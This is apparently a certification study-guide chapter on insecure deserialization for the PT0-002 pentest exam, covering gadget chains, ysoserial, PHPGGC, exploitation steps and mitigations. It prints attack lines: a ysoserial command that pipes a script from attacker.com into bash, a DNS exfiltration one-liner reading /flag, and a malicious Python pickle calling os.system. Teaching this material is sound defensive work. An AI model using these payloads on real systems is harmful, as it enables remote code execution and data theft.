Insecure deserialization attacks are a critical vulnerability that exploit the trust an application places in serialized data. This chapter covers the mechanisms of serialization and deserialization, how attackers manipulate serialized objects to execute arbitrary code, and the specific techniques used in penetration testing. For the PT0-002 exam, this topic appears in approximately 5-10% of questions within Domain 3 (Attacks and Exploits), and understanding it is essential for both exploitation and remediation.
Jump to a section
Imagine you run a warehouse that processes incoming shipments. You have a standard procedure: when a crate arrives, your workers unpack it and place the contents on shelves. One day, a crate arrives labeled 'Fragile: Glassware.' Your workers, following standard procedure, open the crate. Inside, they find a complex mechanical device with a crank. They turn the crank, and the device springs to life, opening a hidden compartment that releases a swarm of robots that start breaking shelves and stealing inventory. The crate was not actually from a trusted supplier; it was crafted by an attacker who knew your unpacking procedure. The attacker designed the device to exploit your trust in the unpacking process itself. In insecure deserialization, the 'crate' is serialized data—like a JSON or XML object. The 'unpacking procedure' is the deserialization process that converts the data back into an object. The attacker crafts malicious data that, when deserialized, executes arbitrary code or performs unintended actions. The key is that the deserialization process blindly trusts the data's structure and content, without validation, allowing the attacker to inject malicious logic. Just as you would inspect a crate's origin and contents before unpacking, secure deserialization requires validating the data's integrity and authenticity before processing it.
What is Insecure Deserialization?
Serialization is the process of converting an object (a data structure or object state) into a format that can be stored or transmitted, such as a byte stream, JSON, XML, or YAML. Deserialization is the reverse process—reconstructing the object from the serialized format. Insecure deserialization occurs when an application deserializes untrusted data without proper validation, allowing an attacker to manipulate the serialized object to alter the application's behavior, often leading to remote code execution (RCE), privilege escalation, or other attacks.
How Deserialization Works Internally
The deserialization process typically involves:
Reading the serialized data format (e.g., byte array, JSON string).
Parsing the data to identify the object structure and its fields.
Allocating memory for the object and populating its properties.
Invoking constructors or initialization methods.
Returning the reconstructed object to the application.
In many languages (Java, PHP, Python, .NET), the deserialization process can trigger arbitrary code execution if the serialized data contains references to classes that execute code during deserialization (e.g., __wakeup() in PHP, readObject() in Java, __reduce__ in Python). Attackers exploit this by crafting serialized payloads that instantiate gadget chains—sequences of method calls that lead to RCE.
Key Components and Values
Serialized Data Formats: Binary (Java serialization, PHP serialization), JSON, XML, YAML.
Magic Methods: PHP __wakeup(), __destruct(), __toString(); Java readObject(), readResolve(), finalize(); Python __reduce__, __reduce_ex__.
Gadget Chains: Specific classes and methods that can be chained to achieve RCE. Common Java gadgets include Apache Commons Collections, Spring, and JDK built-in classes.
ysoserial: A popular tool for generating Java deserialization payloads. It includes pre-built gadget chains for various libraries.
PHPGGC: Similar tool for PHP gadget chains.
Common Targets: Java RMI (Remote Method Invocation), JMX (Java Management Extensions), JMS (Java Message Service), PHP unserialize() calls, Python pickle, .NET BinaryFormatter.
Default Values and Timers
Java Serialization: Uses ObjectOutputStream and ObjectInputStream. The serialized stream includes class metadata and object data. The default serialization protocol version is 1.0.
PHP Serialization: serialize() and unserialize() functions. The format uses string representations: O:4:"User":1:{s:4:"name";s:4:"John";} (object of class User with one property 'name' set to 'John').
Python Pickle: pickle.dumps() and pickle.loads(). The protocol versions are 0-5, with protocol 2 being default in Python 2 and protocol 3 in Python 3.
.NET BinaryFormatter: Uses Serialize() and Deserialize() methods. The format is binary and includes type information.
Configuration and Verification Commands
Penetration testers use various tools to identify and exploit insecure deserialization:
Burp Suite: Use the Deserialization Scanner extension to detect serialized objects in requests. Look for Base64-encoded data, raw binary, or specific format markers (e.g., rO0 for Java serialized objects in Base64).
ysoserial: Generate payloads:
java -jar ysoserial.jar CommonsCollections1 'curl http://attacker.com/evil.sh | bash' > payload.binPHPGGC: Generate PHP gadget chain payloads:
php phpgcc.php -l -w RCE 'system' 'id'Python Pickle: Craft malicious pickle:
import pickle
import os
class Evil(object):
def __reduce__(self):
return (os.system, ('id',))
payload = pickle.dumps(Evil())Manual Detection: Look for O:, a:, s: in PHP serialized strings; Base64 strings starting with rO0 (Java serialization header in Base64: aced0005).
How It Interacts with Related Technologies
Insecure deserialization often intersects with:
- SQL Injection: Serialized objects may contain SQL queries that are executed upon deserialization.
- XSS: JSON deserialization can lead to JavaScript execution if the data is parsed by JSON.parse() with a reviver function that executes code.
- SSRF: Deserialization can trigger requests to internal services.
- Authentication Bypass: Serialized session tokens can be modified to escalate privileges.
Prevention Mechanisms
Input Validation: Validate the integrity of serialized objects using HMAC signatures or digital signatures.
Type Whitelisting: Only allow deserialization of known safe classes.
Use Safer Formats: Prefer JSON or XML with no code execution capabilities over binary serialization or pickle.
Isolate Deserialization: Run deserialization in a sandboxed environment with minimal privileges.
Avoid Deserialization of Untrusted Data: If possible, use alternative data transfer methods like REST APIs with JSON.
Exploitation Steps
Identify Entry Points: Find where serialized data is accepted (e.g., HTTP request parameters, cookies, hidden fields, session tokens).
Detect Serialization Format: Determine the serialization format (Java, PHP, Python, .NET) by examining the data structure.
Identify Gadget Chains: Determine which libraries are available on the server (e.g., Commons Collections, Fastjson, Jackson).
Craft Payload: Use tools like ysoserial or PHPGGC to generate a payload that executes a command or exfiltrates data.
Send Payload: Inject the malicious serialized object into the application.
Execute: The application deserializes the payload, triggering the gadget chain and executing the attacker's commands.
Common Vulnerable Functions
PHP: unserialize()
Java: ObjectInputStream.readObject(), ObjectInputStream.readUnshared()
Python: pickle.loads(), yaml.load() (without SafeLoader)
.NET: BinaryFormatter.Deserialize(), SoapFormatter.Deserialize(), LosFormatter.Deserialize()
Ruby: Marshal.load(), YAML.load()
Real-World Examples
Apache Struts 2 (CVE-2017-5638): Remote code execution via deserialization of malicious Content-Type headers.
JBoss (CVE-2017-12149): Deserialization vulnerability in the HTTPInvoker component.
WebLogic (CVE-2017-10271): Deserialization via XMLDecoder.
Fastjson (CVE-2019-12086): Deserialization of malicious JSON objects.
Detection in Penetration Testing
Passive Scan: Use Burp Suite's passive scanner to flag potential serialized objects.
Active Scan: Send crafted payloads and observe responses for time delays, errors, or out-of-band interactions.
Out-of-Band Detection: Use DNS/HTTP callback servers (e.g., Burp Collaborator) to detect when a payload executes and makes a network request.
Advanced Techniques
Blind Deserialization: When the application does not return output, use timing attacks (e.g., sleep(10)) or out-of-band exfiltration.
Object Injection via __toString: In PHP, if a class has a __toString method that executes code, triggering it through string conversion can lead to RCE.
Java Deserialization with No Gadgets: In some cases, you can use Runtime or ProcessBuilder directly if the class is available.
Summary of Key Points for PT0-002
The exam expects you to identify insecure deserialization vulnerabilities in code snippets and know how to exploit them.
Understand the role of magic methods and gadget chains.
Know the tools: ysoserial, PHPGGC, Burp Suite Deserialization Scanner.
Recognize common serialization formats: Java binary, PHP serialized, Python pickle.
Be able to recommend mitigations: input validation, type whitelisting, safer formats.
Identify Serialized Data Entry Points
Begin by mapping the application's attack surface to find where serialized data is accepted. Common entry points include HTTP request parameters, cookies, hidden form fields, session tokens, and XML/JSON endpoints that expect objects. Use Burp Suite's passive scanner or manually inspect traffic for characteristics like Base64-encoded strings, raw binary data, or format-specific markers (e.g., `rO0` for Java serialization in Base64). Look for endpoints that deserialize data from user input, such as PHP scripts using `unserialize()`, Java applications using `ObjectInputStream.readObject()`, or Python apps using `pickle.loads()`. Also check for indirect deserialization, such as when the application reads serialized objects from databases or message queues that are influenced by user input.
Determine Serialization Format and Version
Once you identify a potential deserialization point, determine the exact format and version of serialization used. For Java, the magic bytes are `aced0005` (hex) which translates to `rO0AB` in Base64. PHP serialized strings start with `O:`, `a:`, `s:`, etc. Python pickle has distinct headers depending on protocol version (e.g., `\x80\x03` for protocol 3). .NET BinaryFormatter uses a binary format with type metadata. Use tools like `file` command or hex dump to analyze the data. Knowing the format allows you to select the correct payload generator and gadget chain. Some applications may use custom serialization formats; in that case, you may need to reverse-engineer the format by decompiling the application.
Identify Available Gadget Chains
Gadget chains are sequences of method calls that lead to arbitrary code execution. They rely on specific libraries present in the application's classpath (Java) or included files (PHP). Use information gathering techniques to determine the libraries in use: examine error messages, default headers, or conduct fingerprinting via known endpoints. For Java, common gadget libraries include Apache Commons Collections, Spring, JDK built-in classes, and Jackson. For PHP, popular gadgets are in Monolog, SwiftMailer, and Guzzle. Tools like ysoserial and PHPGGC include pre-built chains for these libraries. If you cannot determine the exact library, try multiple common chains. In a penetration test, you can also attempt to trigger an out-of-band interaction (e.g., DNS lookup) to confirm a successful chain without relying on a specific library.
Craft Malicious Serialized Payload
Using a tool like ysoserial for Java or PHPGGC for PHP, generate a payload that executes a command or exfiltrates data. Specify the desired gadget chain and the command to execute. For example, using ysoserial: `java -jar ysoserial.jar CommonsCollections1 'ping -c 1 attacker.com' > payload.bin`. The tool produces a binary serialized object that, when deserialized, triggers the gadget chain and executes the command. For blind exploitation, use out-of-band techniques such as DNS exfiltration (e.g., `nslookup $(cat /flag).attacker.com`). Ensure the payload is properly encoded for the transport (e.g., URL-encode if sent in a parameter). Test the payload locally against a similar environment if possible to verify it works.
Inject Payload and Trigger Deserialization
Send the crafted payload to the application's deserialization endpoint. This could be via an HTTP request with the payload in a cookie, parameter, or body. Observe the application's response for signs of successful exploitation: time delays (if using `sleep`), network callbacks to your listener, changes in behavior, or error messages that reveal code execution. If the application does not return output, you must rely on out-of-band detection. Set up a listener (e.g., Burp Collaborator, netcat, or a DNS server) to catch callbacks from the payload. For example, if the payload executes `curl http://attacker.com/` and you receive a request, the exploit succeeded. If the application is stateful, you might need to maintain session context. After successful execution, escalate to a full interactive shell or further exploitation as needed.
In a real-world enterprise, insecure deserialization often surfaces in legacy systems that rely on Java-based middleware like Apache Struts, JBoss, WebLogic, or custom applications using PHP's unserialize(). Consider a large e-commerce platform that uses Java RMI for internal service communication. The application serializes user session objects and stores them in cookies. A penetration tester discovers that the cookie is a Base64-encoded Java serialized object. By decoding it, they identify the class structure and find that the server has Apache Commons Collections 3.1 in its classpath. Using ysoserial's CommonsCollections1 gadget chain, they craft a payload that executes a reverse shell. The exploit succeeds because the application deserializes the cookie without validation. Another scenario: a financial institution uses a PHP-based CRM that stores user preferences in a serialized object in a database. An attacker gains SQL injection access to the database and modifies a serialized preference field to include a gadget chain from the Monolog library, which is used for logging. When the application deserializes the preferences, it triggers remote code execution. In both cases, the root cause is the lack of integrity checks on serialized data. Mitigations include signing serialized objects with HMAC, using whitelists for allowed classes, and migrating to safer data formats like JSON. However, due to legacy constraints, many organizations opt for input validation and monitoring. Performance considerations: deserialization is CPU-intensive, especially for large objects; adding cryptographic signing can further impact performance. Misconfiguration often occurs when developers disable default security features (e.g., Java's ObjectInputFilter or PHP's allowed_classes option in unserialize()) without understanding the risks.
The PT0-002 exam tests insecure deserialization under Objective 3.2 (Exploit vulnerabilities in applications). Expect 1-3 questions directly on this topic, often in scenario-based formats where you must identify the vulnerability, choose the correct exploitation tool, or recommend mitigation. Common wrong answers include: (1) Confusing deserialization with serialization—candidates think the attack is on the serialization process itself, but the vulnerability is during deserialization. (2) Selecting SQL injection as the attack type when the code shows unserialize()—the exam loves to mix up vulnerability types. (3) Assuming that JSON deserialization is always safe—while JSON itself doesn't execute code, if the application uses eval() or a reviver function, it can be exploited. (4) Believing that using a signed serialized object is sufficient—the exam emphasizes that signature verification must be performed before deserialization, not after. Key numbers and terms: rO0AB (Base64 Java serialization header), aced0005 (hex magic bytes), O: (PHP object serialization), __wakeup(), __destruct(), ysoserial, PHPGGC, gadget chain, type whitelisting. The exam tests edge cases like: what if the serialized object is encrypted? Answer: encryption without integrity checking is still vulnerable if the attacker can manipulate the ciphertext (e.g., via padding oracle attacks). Another edge case: deserialization in memory-constrained environments—the attack may cause denial of service via resource exhaustion. To eliminate wrong answers, focus on the mechanism: if the data is reconstructed into an object and the process can call user-controlled methods, it's deserialization. If the data is just parsed into a simple data structure (like JSON to dictionary), it's safer. Always look for magic methods or callbacks that execute code.
Insecure deserialization occurs when an application deserializes untrusted data without validation, potentially leading to RCE or other attacks.
Java serialized objects start with hex bytes `aced0005` or Base64 `rO0AB`.
PHP serialized strings begin with `O:` for objects, `a:` for arrays, `s:` for strings.
Gadget chains are sequences of method calls that exploit magic methods like `__wakeup()`, `readObject()`, `__reduce__`.
ysoserial is the primary tool for generating Java deserialization payloads.
PHPGGC is the primary tool for generating PHP deserialization payloads.
Mitigations include type whitelisting, input validation, using safer formats (JSON/XML), and signing serialized data with HMAC.
The exam expects you to identify vulnerable code snippets (e.g., `unserialize($_GET['data'])`) and recommend proper defenses.
Blind deserialization can be detected via out-of-band techniques like DNS callbacks.
Encryption alone does not prevent deserialization attacks; integrity protection is required.
These come up on the exam all the time. Here's how to tell them apart.
Java Deserialization
Uses binary format with magic bytes `aced0005`.
Gadget chains rely on libraries like Commons Collections, Spring.
Exploitation tools: ysoserial (Java).
Common entry points: RMI, JMX, HTTPInvoker.
Mitigations: ObjectInputFilter, type whitelisting.
PHP Deserialization
Uses string format with markers like `O:`, `a:`, `s:`.
Gadget chains rely on libraries like Monolog, SwiftMailer.
Exploitation tools: PHPGGC, phpggc.
Common entry points: `unserialize()` calls in user input.
Mitigations: `allowed_classes` option in `unserialize()`, type whitelisting.
Mistake
JSON deserialization is always safe because JSON cannot contain functions.
Correct
While JSON itself does not execute code, the application may use a reviver function in `JSON.parse()` or pass the parsed object to a function that executes code based on object properties. Additionally, if the application uses `eval()` on JSON strings, it becomes vulnerable. The exam expects you to recognize that any deserialization of untrusted data can be dangerous if the application processes it unsafely.
Mistake
Using signed serialized objects prevents all deserialization attacks.
Correct
Signing serialized objects with HMAC or digital signatures can prevent tampering only if the signature is verified before deserialization. If the application verifies the signature after deserialization, an attacker can still exploit the deserialization process itself. Also, if the signing key is compromised, the protection is lost. The exam emphasizes that signature verification must occur prior to deserialization.
Mistake
Insecure deserialization only affects Java applications.
Correct
Insecure deserialization affects many languages including PHP, Python, Ruby, .NET, and even JavaScript (via `JSON.parse` with reviver). The exam includes examples from multiple languages. For instance, PHP's `unserialize()` and Python's `pickle.loads()` are common vectors. The key is the presence of magic methods that execute code during deserialization.
Mistake
Deserialization attacks always result in remote code execution.
Correct
While RCE is a common goal, deserialization can also lead to other attacks such as denial of service (via resource exhaustion), privilege escalation (by manipulating object properties), authentication bypass (by modifying session objects), and SQL injection (if the deserialized object contains SQL queries). The exam may test these alternative impacts.
Mistake
If the serialized data is encrypted, it is safe from deserialization attacks.
Correct
Encryption alone does not prevent deserialization attacks if the attacker can manipulate the ciphertext (e.g., via padding oracle attacks) or if the decryption key is known. More importantly, encryption does not validate the integrity of the decrypted data; an attacker can still craft a malicious serialized object and encrypt it if they have access to the encryption key or can exploit a padding oracle to modify the plaintext. The exam expects you to understand that integrity protection (e.g., HMAC) is necessary.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
Serialization converts an object into a format that can be stored or transmitted (e.g., byte stream, JSON string). Deserialization is the reverse process—reconstructing the object from that format. Insecure deserialization attacks exploit the deserialization process, not serialization. The PT0-002 exam expects you to know that the vulnerability lies in deserializing untrusted data.
Look for serialized data in HTTP requests: Base64-encoded strings starting with `rO0AB` (Java), strings containing `O:`, `a:` (PHP), or binary data. Use Burp Suite's Deserialization Scanner extension. Also check for endpoints that accept serialized objects, such as RMI or JMX interfaces. Send payloads that cause time delays (e.g., `sleep(10)`) or out-of-band interactions to confirm vulnerability.
Gadget chains are sequences of method calls that, when triggered during deserialization, lead to arbitrary code execution. They exploit magic methods like `__wakeup()` in PHP or `readObject()` in Java. Tools like ysoserial and PHPGGC pre-build chains for common libraries. The attacker supplies a serialized object that references these chains, and the deserialization process unwittingly executes them.
Yes, if the application uses a reviver function in `JSON.parse()` that executes code based on object properties, or if the parsed JSON is passed to `eval()` or similar functions. However, standard JSON parsing without revivers is generally safe because JSON only represents data, not code. The exam may test this nuance.
The best mitigation is to avoid deserializing untrusted data altogether. If that is not possible, use type whitelisting to restrict which classes can be deserialized, validate the integrity of serialized data with HMAC signatures, and use safer data formats like JSON (without revivers). Additionally, run deserialization in a sandboxed environment with minimal privileges.
ysoserial is a Java tool that generates serialized objects containing gadget chains. It takes a gadget chain name and a command as input, and outputs a binary serialized object. When deserialized by a vulnerable application, the gadget chain executes the command. It supports many common libraries like Commons Collections, Spring, and JDK built-in classes.
Magic methods are special methods that are automatically called during object lifecycle events. For example, `__wakeup()` in PHP is called when an object is deserialized. Attackers craft serialized objects that trigger these methods, which in turn execute arbitrary code if the methods contain dangerous operations. Understanding these methods is crucial for both exploitation and defense.
You've just covered Insecure Deserialization Attacks — now see how well it sticks with free PT0-002 practice questions. Full explanations included, no account needed.
Done with this chapter?